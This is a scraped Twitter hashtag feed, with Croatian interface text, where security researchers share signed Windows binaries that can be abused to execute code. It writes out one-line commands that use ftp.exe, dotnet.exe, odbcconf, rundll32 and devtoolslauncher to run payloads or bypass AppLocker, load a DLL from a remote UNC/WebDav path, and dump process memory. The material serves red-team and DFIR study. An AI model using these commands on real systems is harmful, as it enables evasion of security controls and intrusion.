-
Today I found out that ftp.exe can be used as a
#lolbin. run ftp.exe, type "!" (calls the shell() function inside ftp.exe) followed by whatever it is that you want to run, i.e "!powershell" File under: Things that my teammates and I are finding when looking at windows binaries. pic.twitter.com/JlsyxaolXE
-
For all your
#LOLBin needs Windows: https://lolbas-project.github.io/ Unix: https://gtfobins.github.io/ -
dotnet.exe [PATH_TO_DLL] Its just like doing python http://script.py . (funny) dotnet.exe is trusted binary and Default AppLocker rule don't block it so its a valid AppLocker bypass. Similar to regasm.exe. CC
@egre55#lolbin -
Use the MS-signed executable "dvdplay.exe"
#lolbin to run your binaries pic.twitter.com/BPozaA4cND
Prikaži ovu nit -
I hear you like lolbins... odbcconf.exe /a {REGSVR c:\test\test.dll" it loads the DLL and calls DllRegisterServer :)
#LOLBINPrikaži ovu nit -
how to be a bad ctor http://www.hexacorn.com/blog/2020/01/24/how-to-be-a-bad-ctor/ … ctor.dll, LaunchSetup <filename>
#LOLBIN -
MS signed
#lolbin ExtExport accepts UNC paths. Loads DLL from local disk, SMB and WebDav links. 64 and 32 bit bins on disk. .\ExtExport.exe "\\http://live.sysinternals.com \tools\Autoruns64.dll" a b JSON FIREFOX c Anyone care to test if it has evasive properties?pic.twitter.com/ulmnlfR42E
-
Just published the awaited blog post on the
#bitsadmin It was a fun tool and a pesky#lolbin https://www.hackingarticles.in/windows-for-pentester-bitsadmin/ … -
Windows 10 1803 has some interesting new binaries. I don't need to explain this picture.... - Well, they are signed at least
#LOLBins#LOLBin#DFIR#RedTeampic.twitter.com/CZyVGQ0PPt
Prikaži ovu nit -
SettingSyncHost.exe as a LolBin http://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/ …
#LOLBIN cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo pic.twitter.com/dOM4EHq4Zu -
In addition steamservice.exe can call custom .vdf files directly without having to modify any game-specific .vdf's
#lolbin pic.twitter.com/OJgsRFdmO9
Prikaži ovu nit -
Synaptics Touchpad Enhancements
#LOLBIN SynTPEnh.exe “provides additional configurations and support” Okay! Execute my malicious binary for me
cc @Oddvarmoepic.twitter.com/5VR6GhoMPz
-
this looks like a
#lolbin (signed by citrix) similar to "setupapi.dll,InstallHinfSection" https://lolbas-project.github.io/lolbas/Libraries/Setupapi/ … u can download citrix exe from https://app.any.run/tasks/d9f62b6f-4ced-407c-9445-1e98fbb523b3/ …pic.twitter.com/kPij10E3YT
Prikaži ovu nit -
CML Execution Using DXCap.exe To Launch Executive From Prompt-CML
#LoLBin &- DXCap.exe -c C:\Windows\System32\notepad.exe &- Raw https://gist.github.com/homjxi0e/55c91aaa1534df35fc24e48fb237c6d9 …pic.twitter.com/NPnFD0JANN
Prikaži ovu nit -
c:\windows\system32\devtoolslauncher.exe LaunchForDeploy payload.exe "argument here" test Trusted binary will execute your payload :) Thanks to
@MinatoTW_ & @egriffithCH for testing it on there side. VS or VS code is require i think.#lolbin pic.twitter.com/8mmSjSkbhp -
#Microsoft Office binaries#winword#excel#powerpnt added to#lolbas ||#lolbin https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ … Writeup - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 …#blueteam#redteam#dfir#infosec#pentest Thanks to@Oddvarmoe -
Nice
#LoLBin from Steam (Valve) :-p Dump a Windows process with a Valve Signe Binary: WriteMiniDump.exe PID DumpFilePath@Oddvarmoepic.twitter.com/ow2rWKkOgJ
Prikaži ovu nit -
Is Explorer.exe the ultimate
#lolbin? explorer.exe [exe/hta/scr/...etc] *Invokes child processes when called (after a lookup of the the default program handler) *Hides from the default filter in AutoRuns *Just might be doing a little more on a workstation in your network#DFIRpic.twitter.com/3YmafQmkqs
Prikaži ovu nit -
Stay positive Lolbins... not! http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ …
#LOLBIN rundll32 advpack.dll, RegisterOCX calc.exe rundll32 advpack.dll, #12 calc.exe rundll32 advpack.dll, #+12 calc.exe rundll32 advpack.dll, #-4294967284 calc.exePrikaži ovu nit
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.